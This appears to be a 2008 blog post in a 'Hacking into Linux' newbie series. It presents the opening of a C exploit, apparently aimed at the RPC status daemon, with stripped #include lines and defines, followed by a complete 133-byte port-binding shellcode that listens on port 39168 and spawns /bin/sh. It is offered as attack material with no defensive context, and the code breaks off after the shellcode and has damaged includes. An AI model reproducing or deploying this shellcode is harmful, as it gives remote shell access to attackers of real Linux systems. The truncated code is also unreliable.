Hacking into Linux (NEWBIE SERIES)part5

Tuesday, May 27, 2008 | with 0 comments »
Add to Technorati Favorites

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#define SM_PROG 100024

#define SM_VERS 1

#define SM_STAT 1

#define SM_MAXSTRLEN 1024

#define max(a,b) ((a)>(b)?(a):(b))

#define NOP 0x90

/*

** Non-ripped linux IA32 portbinding shellcode.

** port: 39168 ; length: 133 bytes

*/

char shellcode[] =

"\x31\xc0" /* xorl %eax,%eax */

/* jmp ricochet ------------------------------------------------------- */

"\xeb\x7c" /* jmp 0x7c */

/* kungfu: ------------------------------------------------------------ */

"\x59" /* popl %ecx */

"\x89\x41\x10" /* movl %eax,0x10(%ecx) */

/* ------------------------------------ socket(2,1,0); ---------------- */

"\x89\x41\x08" /* movl %eax,0x8(%ecx) */

"\xfe\xc0" /* incb %al */

"\x89\x41\x04" /* movl %eax,0x4(%ecx) */

"\x89\xc3" /* movl %eax,%ebx */

"\xfe\xc0" /* incb %al */

"\x89\x01" /* movl %eax,(%ecx) */

"\xb0\x66" /* movb $0x66,%al */

"\xcd\x80" /* int $0x80 */

/* ------------------------------------ bind(sd,&sockaddr,16); -------- */

"\xb3\x02" /* movb $0x2,%bl */

"\x89\x59\x0c" /* movl %ebx,0xc(%ecx) */

"\xc6\x41\x0e\x99" /* movb $0x99,0xe(%ecx) */

"\xc6\x41\x08\x10" /* movb $0x10,0x8(%ecx) */

"\x89\x49\x04" /* movl %ecx,0x4(%ecx) */

"\x80\x41\x04\x0c" /* addb $0xc,0x4(%ecx) */

"\x88\x01" /* movb %al,(%ecx) */

"\xb0\x66" /* movb $0x66,%al */

"\xcd\x80" /* int $0x80 */

/* ------------------------------------ listen(sd,blah); -------------- */

"\xb3\x04" /* movb $0x4,%bl */

"\xb0\x66" /* movb $0x66,%al */

"\xcd\x80" /* int $0x80 */

/* ------------------------------------ accept(sd,0,16); -------------- */

"\xb3\x05" /* movb $0x5,%bl */

"\x30\xc0" /* xorb %al,%al */

"\x88\x41\x04" /* movb %al,0x4(%ecx) */

"\xb0\x66" /* movb $0x66,%al */

"\xcd\x80" /* int $0x80 */

/* ------------------------------------ dup2(cd,0); ------------------- */

"\x89\xce" /* movl %ecx,%esi */

"\x88\xc3" /* movb %al,%bl */

"\x31\xc9" /* xorl %ecx,%ecx */

"\xb0\x3f" /* movb $0x3f,%al */

"\xcd\x80" /* int $0x80 */

/* ------------------------------------ dup2(cd,1); ------------------- */

"\xfe\xc1" /* incb %cl */

"\xb0\x3f" /* movb $0x3f,%al */

"\xcd\x80" /* int $0x80 */

/* ------------------------------------ dup2(cd,2); ------------------- */

"\xfe\xc1" /* incb %cl */

"\xb0\x3f" /* movb $0x3f,%al */

"\xcd\x80" /* int $0x80 */

/* ------------------------------------ execve("/bin/sh",argv,0); ----- */

"\xc7\x06\x2f\x62\x69\x6e" /* movl $0x6e69622f,(%esi) */

"\xc7\x46\x04\x2f\x73\x68\x41" /* movl $0x4168732f,0x4(%esi) */

"\x30\xc0" /* xorb %al,%al */

"\x88\x46\x07" /* movb %al,0x7(%esi) */

"\x89\x76\x0c" /* movl %esi,0xc(%esi) */

"\x8d\x56\x10" /* leal 0x10(%esi),%edx */

"\x8d\x4e\x0c" /* leal 0xc(%esi),%ecx */

"\x89\xf3" /* movl %esi,%ebx */

"\xb0\x0b" /* movb $0xb,%al */

"\xcd\x80" /* int $0x80 */

/* ------------------------------------ exit(blah); ------------------- */

"\xb0\x01" /* movb $0x1,%al */

"\xcd\x80" /* int $0x80 */

/* ricochet: call kungfu ---------------------------------------------- */

"\xe8\x7f\xff\xff\xff"; /* call -0x81 */

Add to My AOL Add to Google Reader or Homepage Add to netomat Hub I heart FeedBurner Subscribe in NewsGator Online Subscribe in a reader

0 comments

Post a Comment